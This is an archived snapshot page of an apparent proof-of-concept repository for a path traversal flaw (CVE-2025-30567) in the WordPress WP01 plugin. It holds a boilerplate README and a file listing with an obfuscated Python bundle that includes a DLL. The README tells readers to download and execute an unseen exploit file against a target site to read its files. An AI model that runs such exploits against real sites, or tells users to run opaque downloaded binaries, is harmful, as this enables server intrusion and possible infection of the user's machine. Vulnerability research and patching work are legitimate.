Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-30567 PoC — WordPress plugin WP01 路径遍历漏洞

Source
https://github.com/KaxuFF/CVE-2025-30567-PoC
Associated Vulnerability
Title:WordPress plugin WP01 路径遍历漏洞 (CVE-2025-30567)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WP01 2.6.2及之前版本存在路径遍历漏洞,该漏洞源于路径遍历。
Description
CVE-2025-30567 - WordPress WP01 < Path traversal
Readme
# CVE-2025-30567 - WordPress WP01 Path Traversal Exploit

![CVE-2025-30567](https://img.shields.io/badge/CVE-2025--30567-red) ![WordPress](https://img.shields.io/badge/WordPress-4.0%2B-blue)

## Overview

Welcome to the CVE-2025-30567 Proof of Concept (PoC) repository. This project demonstrates a path traversal vulnerability in WordPress WP01. The vulnerability allows attackers to access files outside the intended directory structure. This can lead to sensitive data exposure and potentially compromise the integrity of the application.

## Table of Contents

- [Description](#description)
- [Vulnerability Details](#vulnerability-details)
- [Installation](#installation)
- [Usage](#usage)
- [Contributing](#contributing)
- [License](#license)
- [Links](#links)

## Description

CVE-2025-30567 targets the WordPress WP01 plugin. This vulnerability stems from improper input validation, which enables attackers to manipulate file paths. The PoC provided here allows you to test the vulnerability in a controlled environment. Understanding this exploit can help developers patch their applications and secure their systems against potential attacks.

## Vulnerability Details

- **CVE ID:** CVE-2025-30567
- **Affected Software:** WordPress WP01
- **Type:** Path Traversal
- **Severity:** High

### Impact

An attacker can exploit this vulnerability to read arbitrary files on the server. This can lead to:

- Exposure of sensitive information (e.g., configuration files, user data)
- Further exploitation of the server
- Potential data breaches

### Affected Versions

This vulnerability affects all versions of WordPress WP01 prior to the patch release. Users should upgrade to the latest version to mitigate this risk.

## Installation

To set up the PoC, follow these steps:

1. Clone the repository:
   ```bash
   git clone https://github.com/KaxuFF/CVE-2025-30567-PoC.git
   ```

2. Navigate to the project directory:
   ```bash
   cd CVE-2025-30567-PoC
   ```

3. Ensure you have the necessary dependencies installed. You may need to install specific libraries or tools based on your environment.

4. Download the exploit file from the [Releases section](https://github.com/KaxuFF/CVE-2025-30567-PoC/releases). This file needs to be downloaded and executed to test the vulnerability.

## Usage

Once you have the exploit file, follow these steps to use it:

1. Ensure your WordPress WP01 installation is running.
2. Execute the downloaded exploit file:
   ```bash
   ./exploit-file-name
   ```

3. Observe the output. If the vulnerability is present, you will see the contents of sensitive files displayed in the console.

### Example Command

Here is an example command to execute the exploit:

```bash
./exploit-file-name --target http://your-wordpress-site.com
```

Replace `http://your-wordpress-site.com` with the URL of your WordPress installation.

## Contributing

Contributions are welcome! If you would like to help improve this project, please follow these steps:

1. Fork the repository.
2. Create a new branch:
   ```bash
   git checkout -b feature/YourFeature
   ```

3. Make your changes and commit them:
   ```bash
   git commit -m "Add your message here"
   ```

4. Push to the branch:
   ```bash
   git push origin feature/YourFeature
   ```

5. Create a pull request.

Please ensure that your contributions adhere to the coding standards and best practices.

## License

This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.

## Links

For more information, visit the [Releases section](https://github.com/KaxuFF/CVE-2025-30567-PoC/releases) to download the exploit file and access the latest updates. 

Feel free to explore the various topics related to this repository:

- [codeb0ss](https://github.com/topics/codeb0ss)
- [cve-2025](https://github.com/topics/cve-2025)
- [cve-2025-30567](https://github.com/topics/cve-2025-30567)
- [cve-2025-30567-exp](https://github.com/topics/cve-2025-30567-exp)
- [cve-2025-30567-poc](https://github.com/topics/cve-2025-30567-poc)
- [cve-2025-30567-wordpress](https://github.com/topics/cve-2025-30567-wordpress)
- [cves](https://github.com/topics/cves)
- [exploits](https://github.com/topics/exploits)
- [uncodeboss](https://github.com/topics/uncodeboss)
- [wordpress](https://github.com/topics/wordpress)

Thank you for your interest in CVE-2025-30567!
File Snapshot

 [4.0K]  /data/pocs/dbd98ffa281a1da0d10e797185a5b02dccddd024
├── [ 19K]  CVE-2025-30567.py
├── [4.0K]  pytransform
│   ├── [   1]  @
│   ├── [ 11K]  __init__.py
│   ├── [ 15K]  __init__.pyc
│   ├── [ 220]  license.lic
│   ├── [699K]  _pytransform.dll
│   └── [ 476]  pytransform.key
└── [4.3K]  README.md

1 directory, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.